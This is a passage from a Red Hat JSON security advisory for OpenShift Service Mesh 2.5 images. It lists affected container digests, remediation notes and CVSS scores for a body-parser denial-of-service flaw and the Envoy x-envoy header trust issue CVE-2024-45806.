"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
},
{
"acknowledgments": [
{
"names": [
"Mike Whale"
]
},
{
"names": [
"James Force"
],
"organization": "Red Hat",
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2024-45806",
"cwe": {
"id": "CWE-639",
"name": "Authorization Bypass Through User-Controlled Key"
},
"discovery_date": "2024-09-20T00:40:20.976812+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2313683"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in Envoy that allows external clients to manipulate Envoy headers, potentially leading to unauthorized access or other malicious actions within the mesh. This issue arises due to Envoy\u0027s default configuration of internal trust boundaries, which considers all RFC1918 private address ranges as internal. The default behavior for handling internal addresses in Envoy has been changed. Previously, RFC1918 IP addresses were automatically considered internal, even if the internal_address_config was empty. The default configuration of Envoy will continue to trust internal addresses while in this release and it will not trust them by default in next release. If you have tooling such as probes on your private network which need to be treated as trusted such as changing arbitrary x-envoy headers, please explicitly include those addresses or CIDR ranges into `internal_address_config`. Successful exploitation could allow attackers to bypass security controls, access sensitive data, or disrupt services within the mesh, like Istio.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Potential to manipulate `x-envoy` headers from external sources",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat\u0027s CVSS score and impact are specific to our product and may not match those of upstream. This is due to how envoy is configured and used within our OpenShift Service Mesh product.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45806"
},
{
"category": "external",
"summary": "RHBZ#2313683",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313683"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45806",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45806"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45806",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45806"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf"
}
],
"release_date": "2024-09-20T00:15:02.293000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
